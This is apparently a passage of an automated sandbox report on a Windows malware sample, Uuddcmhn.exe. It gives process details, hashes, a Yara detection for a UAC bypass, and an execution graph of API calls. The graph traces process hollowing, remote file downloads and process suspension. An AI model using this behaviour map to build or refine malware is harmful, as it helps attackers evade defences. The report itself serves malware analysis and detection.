                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Target ID:6
                                                              Start time:17:08:50
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low

                                                              Target ID:12
                                                              Start time:17:08:55
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Uuddcmhn.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Target ID:14
                                                              Start time:17:08:58
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low


                                                                Execution Graph

                                                                Execution Coverage:12.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:55.1%
                                                                Total number of Nodes:1726
                                                                Total number of Limit Nodes:19
11 API calls 17929->17931 17934 2527a6b 17930->17934 17935 2528e66 17931->17935 17933 2514bb0 11 API calls 17932->17933 17938 252811a 17933->17938 17936 2514c24 11 API calls 17934->17936 17937 25236cc 20 API calls 17935->17937 17943 2527ab9 17936->17943 17939 2528e8a 17937->17939 17941 25236cc 20 API calls 17938->17941 17940 2514c24 11 API calls 17939->17940 17948 2528eaa 17940->17948 17942 252813e 17941->17942 18509 2525540 17942->18509 18462 2517c64 17943->18462 17952 2514bb0 11 API calls 17948->17952 17949 25148f4 11 API calls 17951 2528163 17949->17951 17950 2514bb0 11 API calls 17957 2527af7 17950->17957 17953 2525698 14 API calls 17951->17953 17958 2528edf 17952->17958 17954 2528173 17953->17954 17955 2525540 11 API calls 17954->17955 17956 2528188 17955->17956 17959 25148f4 11 API calls 17956->17959 17960 2517c64 11 API calls 17957->17960 17963 25236cc 20 API calls 17958->17963 17961 2528198 17959->17961 17962 2527b1d 17960->17962 17964 2525698 14 API calls 17961->17964 17967 2514bb0 11 API calls 17962->17967 17965 2528f03 17963->17965 17966 25281a8 17964->17966 17968 2514c24 11 API calls 17965->17968 17969 2514c24 11 API calls 17966->17969 17970 2527b33 17967->17970 17975 2528f23 17968->17975 17971 25281c8 17969->17971 17973 2525ac0 11 API calls 17970->17973 17972 2525698 14 API calls 17971->17972 17978 25281d9 17972->17978 17974 2527b5e 17973->17974 17976 2514c24 11 API calls 17974->17976 17977 2514bb0 11 API calls 17975->17977 17980 2527b79 17976->17980 17982 2528f58 17977->17982 17979 2517c64 11 API calls 17978->17979 17981 252820e 17979->17981 18466 2521c04 17980->18466 17984 2514c24 11 API calls 17981->17984 17983 25236cc 20 API calls 17982->17983 17985 2528f7c 17983->17985 17990 252823e 17984->17990 17986 2514c24 11 API calls 17985->17986 17988 2528f9c 17986->17988 17987 2527ba1 17987->17369 17989 2514bb0 11 API calls 17988->17989 17991 2528fd1 17989->17991 17990->17369 17992 25236cc 20 API calls 17991->17992 17995 2528ff5 17992->17995 17993 252934e 
17994 2514c24 11 API calls 17993->17994 17996 252936e 17994->17996 17995->17993 17997 2529034 17995->17997 17999 2514bb0 11 API calls 17996->17999 17998 2514c24 11 API calls 17997->17998 18000 2529054 17998->18000 18001 25293a3 17999->18001 18002 2514bb0 11 API calls 18000->18002 18003 25236cc 20 API calls 18001->18003 18004 2529089 18002->18004 18009 25293c7 18003->18009 18007 25236cc 20 API calls 18004->18007 18005 2529841 18006 2514c24 11 API calls 18005->18006 18011 2529861 18006->18011 18008 25290ad 18007->18008 18010 2514c24 11 API calls 18008->18010 18009->18005 18012 2529406 18009->18012 18015 25290cd 18010->18015 18013 2514bb0 11 API calls 18011->18013 18014 2514c24 11 API calls 18012->18014 18017 2529896 18013->18017 18018 2529426 18014->18018 18016 2514bb0 11 API calls 18015->18016 18021 2529102 18016->18021 18019 25236cc 20 API calls 18017->18019 18020 2514bb0 11 API calls 18018->18020 18033 25298ba 18019->18033 18025 252945b 18020->18025 18022 25236cc 20 API calls 18021->18022 18023 2529126 18022->18023 18026 2514c24 11 API calls 18023->18026 18024 2529a11 18027 2514c24 11 API calls 18024->18027 18028 25236cc 20 API calls 18025->18028 18032 252915b 18026->18032 18031 2529a46 18027->18031 18029 252947f 18028->18029 18030 2514c24 11 API calls 18029->18030 18037 252949f 18030->18037 18034 2514bb0 11 API calls 18031->18034 18035 2514bb0 11 API calls 18032->18035 18033->18024 18036 2514c24 11 API calls 18033->18036 18039 2529a7b 18034->18039 18040 2529190 18035->18040 18041 2529919 18036->18041 18038 2514bb0 11 API calls 18037->18038 18045 25294d4 18038->18045 18043 25236cc 20 API calls 18039->18043 18044 25236cc 20 API calls 18040->18044 18042 2514bb0 11 API calls 18041->18042 18048 252994e 18042->18048 18050 2529a9f 18043->18050 18047 25291b4 18044->18047 18046 25236cc 20 API calls 18045->18046 18049 25294f8 WinExec 18046->18049 18052 25236cc 20 API calls 18047->18052 18053 25236cc 20 API calls 18048->18053 18530 25245f8 CreateToolhelp32Snapshot 
18049->18530 18055 25236cc 20 API calls 18050->18055 18056 25291e7 18052->18056 18057 2529972 18053->18057 18059 2529ad2 18055->18059 18061 2514c24 11 API calls 18056->18061 18062 2514c24 11 API calls 18057->18062 18058 2514c24 11 API calls 18063 2529555 18058->18063 18060 2514c24 11 API calls 18059->18060 18064 2529af2 18060->18064 18065 2529207 18061->18065 18066 2529992 18062->18066 18067 2514bb0 11 API calls 18063->18067 18068 2514bb0 11 API calls 18064->18068 18069 2514bb0 11 API calls 18065->18069 18070 2514bb0 11 API calls 18066->18070 18071 252958a 18067->18071 18074 2529b27 18068->18074 18072 252923c 18069->18072 18073 25299c7 18070->18073 18075 25236cc 20 API calls 18071->18075 18076 25236cc 20 API calls 18072->18076 18077 25236cc 20 API calls 18073->18077 18079 25236cc 20 API calls 18074->18079 18078 25295ae 18075->18078 18087 2529260 18076->18087 18080 25299eb 18077->18080 18081 2514dbc 11 API calls 18078->18081 18086 2529b4b 18079->18086 18082 2512fc4 22 API calls 18080->18082 18083 25295b8 18081->18083 18084 25299f8 18082->18084 18537 2523f94 18083->18537 18088 2514dbc 11 API calls 18084->18088 18092 25236cc 20 API calls 18086->18092 18093 25236cc 20 API calls 18087->18093 18090 2529a09 18088->18090 18489 25248a4 18090->18489 18091 2514c24 11 API calls 18099 25295e4 18091->18099 18095 2529b7e 18092->18095 18096 2529293 18093->18096 18097 2514c24 11 API calls 18095->18097 18098 2514c24 11 API calls 18096->18098 18101 2529b9e 18097->18101 18102 25292b3 18098->18102 18100 2514bb0 11 API calls 18099->18100 18105 2529619 18100->18105 18104 2514bb0 11 API calls 18101->18104 18103 2514bb0 11 API calls 18102->18103 18107 25292e8 18103->18107 18108 2529bd3 18104->18108 18106 25236cc 20 API calls 18105->18106 18111 252963d 18106->18111 18110 25236cc 20 API calls 18107->18110 18109 25236cc 20 API calls 18108->18109 18113 2529bf7 18109->18113 18114 252930c 18110->18114 18112 25236cc 20 API calls 18111->18112 18115 2529670 18112->18115 18117 25236cc 20 API calls 
18113->18117 18118 25236cc 20 API calls 18114->18118 18116 2514c24 11 API calls 18115->18116 18123 2529690 18116->18123 18119 2529c2a 18117->18119 18120 252933f 18118->18120 18121 2514c24 11 API calls 18119->18121 18122 2514dbc 11 API calls 18120->18122 18127 2529c4a 18121->18127 18124 2529349 18122->18124 18126 2514bb0 11 API calls 18123->18126 18514 2524f34 18124->18514 18129 25296c5 18126->18129 18128 2514bb0 11 API calls 18127->18128 18131 2529c7f 18128->18131 18130 25236cc 20 API calls 18129->18130 18133 25296e9 18130->18133 18132 25236cc 20 API calls 18131->18132 18136 2529ca3 18132->18136 18134 25236cc 20 API calls 18133->18134 18135 252971c 18134->18135 18137 2514c24 11 API calls 18135->18137 18138 25236cc 20 API calls 18136->18138 18139 252973c 18137->18139 18140 2529cd6 18138->18140 18141 2514bb0 11 API calls 18139->18141 18142 25236cc 20 API calls 18140->18142 18145 2529771 18141->18145 18143 2529d09 18142->18143 18144 2514c24 11 API calls 18143->18144 18147 2529d29 18144->18147 18146 25236cc 20 API calls 18145->18146 18149 2529795 18146->18149 18148 2514bb0 11 API calls 18147->18148 18152 2529d5e 18148->18152 18150 25236cc 20 API calls 18149->18150 18151 25297c8 18150->18151 18153 2514c24 11 API calls 18151->18153 18154 25236cc 20 API calls 18152->18154 18157 25297e8 18153->18157 18155 2529d82 18154->18155 18156 2514c24 11 API calls 18155->18156 18159 2529da2 18156->18159 18158 2514bb0 11 API calls 18157->18158 18161 252981d 18158->18161 18160 2514bb0 11 API calls 18159->18160 18163 2529dd7 18160->18163 18162 25236cc 20 API calls 18161->18162 18162->18005 18164 25236cc 20 API calls 18163->18164 18165 2529dfb 18164->18165 18166 25236cc 20 API calls 18165->18166 18167 2529e2e 18166->18167 18168 25236cc 20 API calls 18167->18168 18169 2529e61 18168->18169 18170 25236cc 20 API calls 18169->18170 18171 2529e94 18170->18171 18172 25236cc 20 API calls 18171->18172 18173 2529ec7 18172->18173 18174 25236cc 20 API calls 18173->18174 18175 2529efa 18174->18175 
18176 25236cc 20 API calls 18175->18176 18177 2529f2d 18176->18177 18178 25236cc 20 API calls 18177->18178 18179 2529f60 18178->18179 18180 25236cc 20 API calls 18179->18180 18181 2529f93 18180->18181 18182 25236cc 20 API calls 18181->18182 18183 2529fc6 18182->18183 18184 25236cc 20 API calls 18183->18184 18185 2529ff9 18184->18185 18186 25236cc 20 API calls 18185->18186 18187 252a02c 18186->18187 18188 25236cc 20 API calls 18187->18188 18189 252a05f 18188->18189 18190 25236cc 20 API calls 18189->18190 18191 252a092 18190->18191 18192 25236cc 20 API calls 18191->18192 18193 252a0c5 18192->18193 18194 25236cc 20 API calls 18193->18194 18195 252a0f8 18194->18195 18196 25236cc 20 API calls 18195->18196 18197 252a12b 18196->18197 18198 25236cc 20 API calls 18197->18198 18199 252a15e 18198->18199 18200 25236cc 20 API calls 18199->18200 18201 252a191 18200->18201 18202 25236cc 20 API calls 18201->18202 18203 252a1c4 18202->18203 18204 25236cc 20 API calls 18203->18204 18205 252a1f7 18204->18205 18206 25236cc 20 API calls 18205->18206 18207 252a22a 18206->18207 18208 25236cc 20 API calls 18207->18208 18209 252a25d 18208->18209 18210 25236cc 20 API calls 18209->18210 18211 252a290 18210->18211 18212 25236cc 20 API calls 18211->18212 18213 252a2c3 18212->18213 18214 25236cc 20 API calls 18213->18214 18215 252a2f6 18214->18215 18216 25236cc 20 API calls 18215->18216 18217 252a329 18216->18217 18218 25236cc 20 API calls 18217->18218 18219 252a35c 18218->18219 18220 25236cc 20 API calls 18219->18220 18221 252a38f 18220->18221 18222 25236cc 20 API calls 18221->18222 18223 252a3c2 18222->18223 18224 25236cc 20 API calls 18223->18224 18225 252a3f5 18224->18225 18226 25236cc 20 API calls 18225->18226 18227 252a428 18226->18227 18228 25236cc 20 API calls 18227->18228 18229 252a45b 18228->18229 18230 25236cc 20 API calls 18229->18230 18231 252a48e 18230->18231 18232 25236cc 20 API calls 18231->18232 18233 252a4c1 18232->18233 18234 25236cc 20 API calls 18233->18234 18235 252a4f4 
18234->18235 18236 25236cc 20 API calls 18235->18236 18237 252a527 18236->18237 18238 25236cc 20 API calls 18237->18238 18239 252a55a 18238->18239 18240 25236cc 20 API calls 18239->18240 18241 252a58d 18240->18241 18242 25236cc 20 API calls 18241->18242 18243 252a5c0 18242->18243 18244 25236cc 20 API calls 18243->18244 18245 252a5f3 18244->18245 18246 2514c24 11 API calls 18245->18246 18247 252a613 18246->18247 18248 2514bb0 11 API calls 18247->18248 18249 252a648 18248->18249 18250 25236cc 20 API calls 18249->18250 18251 252a66c 18250->18251 18252 2514c24 11 API calls 18251->18252 18253 252a68c 18252->18253 18254 2514bb0 11 API calls 18253->18254 18255 252a6c1 18254->18255 18256 25236cc 20 API calls 18255->18256 18257 252a6e5 18256->18257 18258 25236cc 20 API calls 18257->18258 18259 252a718 18258->18259 18260 25236cc 20 API calls 18259->18260 18261 252a74b 18260->18261 18262 25236cc 20 API calls 18261->18262 18263 252a77e 18262->18263 18264 25236cc 20 API calls 18263->18264 18265 252a7b1 ExitProcess 18264->18265 18268 2513031 18267->18268 18269 251303c GetTickCount 18267->18269 18268->17375 18269->17375 18271 25236e7 18270->18271 18551 251cab0 SetErrorMode 18271->18551 18274 2523724 GetModuleHandleA 18275 2523738 18274->18275 18276 252376c FreeLibrary 18274->18276 18279 2523741 GetProcAddress 18275->18279 18277 2523777 18276->18277 18555 25148c4 18277->18555 18281 252375b 18279->18281 18559 25236a0 18281->18559 18284 2514bb4 18283->18284 18285 2514c15 18283->18285 18286 25148f4 18284->18286 18289 2514bbc 18284->18289 18291 2514964 11 API calls 18286->18291 18293 2514908 18286->18293 18287 2514936 18287->17513 18288 2514bcb 18292 2514964 11 API calls 18288->18292 18289->18285 18289->18288 18290 25148f4 11 API calls 18289->18290 18290->18288 18291->18293 18295 2514be5 18292->18295 18293->18287 18294 2512c5c 11 API calls 18293->18294 18294->18287 18296 25148f4 11 API calls 18295->18296 18297 2514c11 18296->18297 18297->17513 18299 25148a0 11 API calls 18298->18299 
18300 2512fd8 18299->18300 18301 2512ffa GetCommandLineA 18300->18301 18302 2512fdc GetModuleFileNameA 18300->18302 18305 2513001 18301->18305 18569 2514990 18302->18569 18306 2512ff8 18305->18306 18574 2512ec8 18305->18574 18307 25181e0 18306->18307 18308 25181f3 18307->18308 18309 2514dc4 11 API calls 18308->18309 18310 2518205 18309->18310 18310->17538 18312 2514df6 18311->18312 18315 2514dc9 18311->18315 18313 25148a0 11 API calls 18312->18313 18314 2514dec 18313->18314 18314->17542 18315->18312 18316 2514ddd 18315->18316 18317 2514990 11 API calls 18316->18317 18317->18314 18319 2514d64 18318->18319 18320 251811a GetFileAttributesA 18319->18320 18321 2518125 18320->18321 18321->17550 18321->17551 18323 25136cb 18322->18323 18590 25135dc 18323->18590 18326 2512d28 18327 251676c 4 API calls 18326->18327 18328 2512d30 18327->18328 18329 25134cc 18328->18329 18330 2513506 18329->18330 18331 25134dd 18329->18331 18333 2512d48 4 API calls 18330->18333 18331->18330 18332 25134e3 GetFileSize 18331->18332 18334 25134f4 18332->18334 18335 25134f9 18332->18335 18333->18335 18606 2512d58 GetLastError 18334->18606 18335->17599 18339 2514d70 18337->18339 18338 2514dab 18343 2513454 18338->18343 18339->18338 18340 2514964 11 API calls 18339->18340 18341 2514d87 18340->18341 18341->18338 18342 2512c5c 11 API calls 18341->18342 18342->18338 18609 25133c4 18343->18609 18347 2513484 18346->18347 18349 25134b3 18346->18349 18347->18349 18351 251348a 18347->18351 18348 25134b1 18348->17617 18349->18348 18350 2512d48 4 API calls 18349->18350 18350->18348 18351->18348 18352 2512d48 4 API calls 18351->18352 18352->18348 18354 2525319 18353->18354 18355 25148f4 11 API calls 18354->18355 18356 2525345 18355->18356 18618 2515a04 18356->18618 18358 2525385 18359 25148f4 11 API calls 18358->18359 18361 2525397 18359->18361 18360 2514dc4 11 API calls 18362 2525369 18360->18362 18364 25148c4 11 API calls 18361->18364 18362->18358 18362->18360 18362->18361 18621 2514e04 18362->18621 18365 
25253fc 18364->18365 18366 2515a4c 18365->18366 18367 2515a53 18366->18367 18368 2515a6d 18367->18368 18369 2515a10 13 API calls 18367->18369 18368->17625 18369->18368 18371 2525b51 18370->18371 18372 2525baf 18371->18372 18751 2514a88 18371->18751 18754 2514b6c 18371->18754 18374 25148a0 11 API calls 18372->18374 18375 2525bc4 18374->18375 18377 25148a0 11 API calls 18375->18377 18378 2525bcc 18377->18378 18378->17632 18380 2514d64 18379->18380 18381 2525248 InternetOpenUrlA 18380->18381 18382 2525262 18381->18382 18383 2525266 HttpQueryInfoA 18381->18383 18384 25252db InternetCloseHandle 18382->18384 18386 25252a1 18383->18386 18384->17636 18385 25252d0 InternetCloseHandle 18385->18384 18386->18385 18388 25148a0 11 API calls 18387->18388 18389 2525994 18388->18389 18390 2517c64 11 API calls 18389->18390 18391 25259af 18390->18391 18392 25259b7 InternetOpenA 18391->18392 18393 25259cf 18392->18393 18394 2525a9c 18392->18394 18395 25259ef InternetOpenUrlA 18393->18395 18396 25148a0 11 API calls 18394->18396 18397 2525a7c InternetCloseHandle 18395->18397 18402 2525a09 18395->18402 18398 2525ab1 18396->18398 18397->17641 18398->17641 18399 2525a17 InternetReadFile 18401 2514990 11 API calls 18399->18401 18401->18402 18402->18399 18403 2514b6c 11 API calls 18402->18403 18404 2525a5c InternetCloseHandle 18402->18404 18403->18402 18404->17641 18407 25258c7 18406->18407 18768 2517bc4 18407->18768 18410 25148c4 11 API calls 18411 2525901 18410->18411 18411->17593 18411->17646 18413 2525bfd 18412->18413 18414 25148a0 11 API calls 18413->18414 18417 2525c15 18414->18417 18415 2525c88 18416 25148f4 11 API calls 18415->18416 18418 2525c96 18416->18418 18417->18415 18419 2514a88 11 API calls 18417->18419 18422 2514b6c 11 API calls 18417->18422 18420 25148c4 11 API calls 18418->18420 18419->18417 18421 2525cb0 18420->18421 18423 25148a0 11 API calls 18421->18423 18422->18417 18424 2525cb8 18423->18424 18424->17689 18430 2525ae5 18425->18430 18426 2525b11 18427 25148a0 11 API 
calls 18426->18427 18429 2525b26 18427->18429 18428 2514a88 11 API calls 18428->18430 18429->17694 18430->18426 18430->18428 18431 2514b6c 11 API calls 18430->18431 18431->18430 18433 2514d64 18432->18433 18434 251813e GetFileAttributesA 18433->18434 18435 2518149 18434->18435 18435->17746 18435->17749 18437 25256ae 18436->18437 18438 25256ce _lcreat 18437->18438 18439 25256dd 18438->18439 18440 2514dbc 11 API calls 18439->18440 18441 25256ed _lwrite _lclose 18440->18441 18442 2525707 18441->18442 18443 25148c4 11 API calls 18442->18443 18444 2525714 18443->18444 18444->17801 18446 2525431 18445->18446 18775 2514938 18446->18775 18449 2514938 11 API calls 18450 2525465 18449->18450 18451 2514938 11 API calls 18450->18451 18452 2525470 18451->18452 18453 25148a0 11 API calls 18452->18453 18460 2525478 18453->18460 18454 2525499 18455 25148c4 11 API calls 18454->18455 18457 252552e 18455->18457 18456 252548e 18458 2514b6c 11 API calls 18456->18458 18457->17912 18458->18454 18459 2514c24 11 API calls 18459->18460 18460->18454 18460->18456 18460->18459 18461 2514dc4 11 API calls 18460->18461 18461->18460 18463 2517c74 18462->18463 18464 2514990 11 API calls 18463->18464 18465 2517c7c 18464->18465 18465->17950 18779 2522a04 18466->18779 18468 2521c1e 18783 2518094 WriteFile 18468->18783 18469 2521c39 18469->17987 18481 25255a2 18471->18481 18472 2525644 18473 2514f90 11 API calls 18472->18473 18474 2525659 18473->18474 18476 25148f4 11 API calls 18474->18476 18475 2514a88 11 API calls 18475->18481 18477 2525664 18476->18477 18479 25148a0 11 API calls 18477->18479 18478 2514b6c 11 API calls 18478->18481 18480 2525679 18479->18480 18482 25148c4 11 API calls 18480->18482 18481->18472 18481->18475 18481->18478 18483 2525686 18482->18483 18483->17874 18485 25148f4 11 API calls 18484->18485 18486 2525924 18485->18486 18487 252596b 18486->18487 18488 2514dbc 11 API calls 18486->18488 18487->17897 18488->18486 18493 25248b7 18489->18493 18490 2524b13 18491 25148a0 11 API calls 
18490->18491 18492 2524b2e 18491->18492 18492->18024 18493->18490 18494 2524958 CreateProcessA 18493->18494 18494->18490 18495 2524966 GetThreadContext 18494->18495 18495->18490 18496 2524988 ReadProcessMemory 18495->18496 18497 25249b8 NtUnmapViewOfSection 18496->18497 18498 2524a1f VirtualAllocEx 18496->18498 18500 25249d0 VirtualAllocEx 18497->18500 18501 25249fb VirtualAllocEx 18497->18501 18499 2524a48 18498->18499 18499->18490 18923 25247b4 18499->18923 18500->18499 18501->18499 18503 2524ab6 WriteProcessMemory SetThreadContext ResumeThread 18504 2512c5c 11 API calls 18503->18504 18504->18490 18505 2524a5c 18505->18503 18507 2514d64 18506->18507 18508 25182d4 CreateDirectoryA 18507->18508 18508->17746 18510 2514f90 11 API calls 18509->18510 18511 2525558 18510->18511 18512 2525579 18511->18512 18513 2514dbc 11 API calls 18511->18513 18512->17949 18513->18511 18926 25152d4 18514->18926 18516 2524f4e VirtualAlloc VirtualAlloc 18928 2512dc8 18516->18928 18518 2524fc6 VirtualProtect 18519 252505e 18518->18519 18523 2524ff7 18518->18523 18520 2515a04 16 API calls 18519->18520 18521 2525085 18520->18521 18526 25250b5 18521->18526 18930 2524de8 18521->18930 18522 252501c VirtualAlloc 18522->18523 18523->18519 18523->18522 18525 25250f1 18528 2515398 13 API calls 18525->18528 18526->18525 18527 25250d8 VirtualProtect 18526->18527 18527->18525 18527->18526 18529 2525140 18528->18529 18529->17993 18531 2524655 OpenProcess NtSuspendProcess 18530->18531 18532 2524615 Process32First 18530->18532 18531->18058 18533 2524627 lstrcmpiA 18532->18533 18534 252464d CloseHandle 18532->18534 18535 2524642 Process32Next 18533->18535 18536 2524636 CloseHandle 18533->18536 18534->18531 18535->18533 18535->18534 18536->18531 18538 2523fd8 VirtualAlloc 18537->18538 18539 2524037 18538->18539 18540 2524005 VirtualFree VirtualAllocEx 18538->18540 18539->18538 18541 2524044 18539->18541 18540->18539 18986 25243f8 18541->18986 18544 25155fc 16 API calls 18545 2524067 18544->18545 18546 
2524070 WriteProcessMemory 18545->18546 18547 25240ac 18545->18547 19004 2523ddc 18546->19004 18549 2515398 13 API calls 18547->18549 18550 25240d9 18549->18550 18550->18091 18563 2514d64 18551->18563 18554 251cafe 18554->18274 18554->18277 18557 25148ca 18555->18557 18556 25148f0 18556->17378 18557->18556 18558 2512c5c 11 API calls 18557->18558 18558->18557 18560 25236ac 18559->18560 18565 252365c VirtualProtect 18560->18565 18564 2514d68 LoadLibraryA 18563->18564 18564->18554 18566 2523674 18565->18566 18567 252369a 18565->18567 18568 2523680 GetCurrentProcess FlushInstructionCache VirtualProtect 18566->18568 18567->18276 18568->18567 18570 2514964 11 API calls 18569->18570 18571 25149a0 18570->18571 18572 25148a0 11 API calls 18571->18572 18573 25149b8 18572->18573 18573->18306 18576 2512edb 18574->18576 18575 2512ed3 CharNextA 18575->18576 18576->18575 18577 2512ef5 18576->18577 18578 2512f49 18577->18578 18579 2512f01 CharNextA 18577->18579 18580 2512f34 CharNextA 18577->18580 18582 2512f0b CharNextA 18577->18582 18583 2512f2a CharNextA 18577->18583 18581 2514f90 11 API calls 18578->18581 18579->18577 18580->18577 18587 2512f52 18581->18587 18582->18577 18583->18577 18584 2512fba 18584->18305 18585 2512f60 CharNextA 18585->18587 18586 2512f9c CharNextA 18586->18587 18587->18584 18587->18585 18587->18586 18588 2512f6a CharNextA 18587->18588 18589 2512f92 CharNextA 18587->18589 18588->18587 18589->18587 18591 25135f3 18590->18591 18592 2513608 18590->18592 18591->18592 18593 251369e 18591->18593 18603 2512d48 18591->18603 18594 2513685 GetStdHandle 18592->18594 18600 2513625 CreateFileA 18592->18600 18597 2512d48 4 API calls 18593->18597 18598 251367c 18594->18598 18599 2513681 18597->18599 18598->18599 18601 25136a5 GetLastError 18598->18601 18599->18326 18600->18598 18601->18593 18604 251676c 4 API calls 18603->18604 18605 2512d50 18604->18605 18605->18592 18607 2512d48 4 API calls 18606->18607 18608 2512d62 18607->18608 18608->18335 18610 2513438 18609->18610 
18611 25133de ReadFile 18609->18611 18612 2512d48 4 API calls 18610->18612 18613 25133f5 GetLastError 18611->18613 18616 2513406 18611->18616 18614 25133ff 18612->18614 18615 2512d48 4 API calls 18613->18615 18614->17610 18615->18614 18616->18614 18617 2512d48 4 API calls 18616->18617 18617->18614 18626 2515878 18618->18626 18745 2514db4 18621->18745 18623 2514e48 18623->18362 18624 2514e12 18624->18623 18625 2514f90 11 API calls 18624->18625 18625->18623 18627 2515897 18626->18627 18632 25158b1 18626->18632 18628 25158a2 18627->18628 18643 2512d1c 18627->18643 18649 2515870 18628->18649 18631 25158ac 18631->18362 18633 25158fa 18632->18633 18634 2512d1c 11 API calls 18632->18634 18635 2515907 18633->18635 18636 251593c 18633->18636 18634->18633 18637 2512c74 11 API calls 18635->18637 18638 2512c40 11 API calls 18636->18638 18640 2515937 18637->18640 18639 2515946 18638->18639 18639->18640 18652 2515858 18639->18652 18640->18631 18642 2515878 16 API calls 18640->18642 18642->18640 18644 2512cd0 18643->18644 18645 2512cf5 18644->18645 18646 251676c 4 API calls 18644->18646 18647 2512cc4 7 API calls 18645->18647 18646->18645 18648 2512d16 18647->18648 18648->18628 18655 2515a10 18649->18655 18702 2515718 18652->18702 18654 2515863 18654->18640 18656 2515a16 18655->18656 18659 2515875 18655->18659 18657 2515a40 18656->18657 18656->18659 18661 25153e4 18656->18661 18658 2512c5c 11 API calls 18657->18658 18658->18659 18659->18631 18662 25153ed 18661->18662 18682 2515422 18661->18682 18663 2515402 18662->18663 18664 2515427 18662->18664 18665 2515444 18663->18665 18666 2515406 18663->18666 18667 2515438 18664->18667 18668 251542e 18664->18668 18670 2515452 18665->18670 18671 251544b 18665->18671 18672 251545b 18666->18672 18673 251540a 18666->18673 18669 25148c4 11 API calls 18667->18669 18674 25148a0 11 API calls 18668->18674 18669->18682 18689 251503c 18670->18689 18686 2515024 18671->18686 18672->18682 18693 25153cc 18672->18693 18677 251546a 18673->18677 18678 
251540e 18673->18678 18674->18682 18681 25153e4 13 API calls 18677->18681 18677->18682 18680 2515488 18678->18680 18685 2515412 18678->18685 18680->18682 18698 2515398 18680->18698 18681->18677 18682->18657 18684 2515a10 13 API calls 18684->18685 18685->18682 18685->18684 18687 2515038 18686->18687 18688 251502a SysFreeString 18686->18688 18687->18682 18688->18687 18690 2515042 18689->18690 18691 2515048 SysFreeString 18690->18691 18692 251505a 18690->18692 18691->18690 18692->18682 18694 25153d5 18693->18694 18695 25153dc 18693->18695 18694->18672 18696 2512d1c 11 API calls 18695->18696 18697 25153e3 18696->18697 18697->18672 18699 25153aa 18698->18699 18700 25153e4 13 API calls 18699->18700 18701 25153c3 18699->18701 18700->18699 18701->18680 18703 251572d 18702->18703 18718 2515753 18702->18718 18705 2515732 18703->18705 18706 2515775 18703->18706 18704 25148f4 11 API calls 18704->18718 18707 2515737 18705->18707 18711 2515789 18705->18711 18715 2515770 18706->18715 18721 2515060 18706->18721 18709 251573c 18707->18709 18714 251579d 18707->18714 18712 2515741 18709->18712 18713 25157be 18709->18713 18711->18715 18731 25155e4 18711->18731 18712->18715 18712->18718 18719 25157ef 18712->18719 18713->18715 18736 25155fc 18713->18736 18714->18715 18716 2515718 16 API calls 18714->18716 18715->18654 18716->18714 18718->18704 18718->18715 18719->18715 18720 2515a4c 13 API calls 18719->18720 18720->18719 18722 2515064 18721->18722 18723 2515087 18721->18723 18724 2515024 18722->18724 18727 2515077 SysReAllocStringLen 18722->18727 18723->18706 18725 2515038 18724->18725 18726 251502a SysFreeString 18724->18726 18725->18706 18726->18725 18727->18723 18728 2514ff4 18727->18728 18729 25152d0 18728->18729 18730 25152ba SysAllocStringLen 18728->18730 18729->18706 18730->18728 18730->18729 18732 25155f4 18731->18732 18735 25155ed 18731->18735 18733 2512d1c 11 API calls 18732->18733 18734 25155fb 18733->18734 18734->18711 18735->18711 18743 2515616 18736->18743 18737 25148f4 11 
API calls 18737->18743 18738 2515060 3 API calls 18738->18743 18739 25155e4 11 API calls 18739->18743 18740 2515702 18740->18713 18741 2515718 16 API calls 18741->18743 18742 25155fc 16 API calls 18742->18743 18743->18737 18743->18738 18743->18739 18743->18740 18743->18741 18743->18742 18744 2515a4c 13 API calls 18743->18744 18744->18743 18746 2514d70 18745->18746 18747 2514dab 18746->18747 18748 2514964 11 API calls 18746->18748 18747->18624 18749 2514d87 18748->18749 18749->18747 18750 2512c5c 11 API calls 18749->18750 18750->18747 18752 2514990 11 API calls 18751->18752 18753 2514a95 18752->18753 18753->18371 18755 2514b70 18754->18755 18756 2514baf 18754->18756 18757 25148f4 18755->18757 18758 2514b7a 18755->18758 18756->18371 18764 2514964 11 API calls 18757->18764 18765 2514908 18757->18765 18759 2514ba4 18758->18759 18760 2514b8d 18758->18760 18761 2514f90 11 API calls 18759->18761 18763 2514f90 11 API calls 18760->18763 18767 2514b92 18761->18767 18762 2514936 18762->18371 18763->18767 18764->18765 18765->18762 18766 2512c5c 11 API calls 18765->18766 18766->18762 18767->18371 18769 2517bd2 18768->18769 18770 2517bf0 18769->18770 18771 2517bf9 18769->18771 18772 25148a0 11 API calls 18770->18772 18774 2514dc4 11 API calls 18771->18774 18773 2517bf7 18772->18773 18773->18410 18774->18773 18777 251493c 18775->18777 18776 2514960 18776->18449 18777->18776 18778 2512c5c 11 API 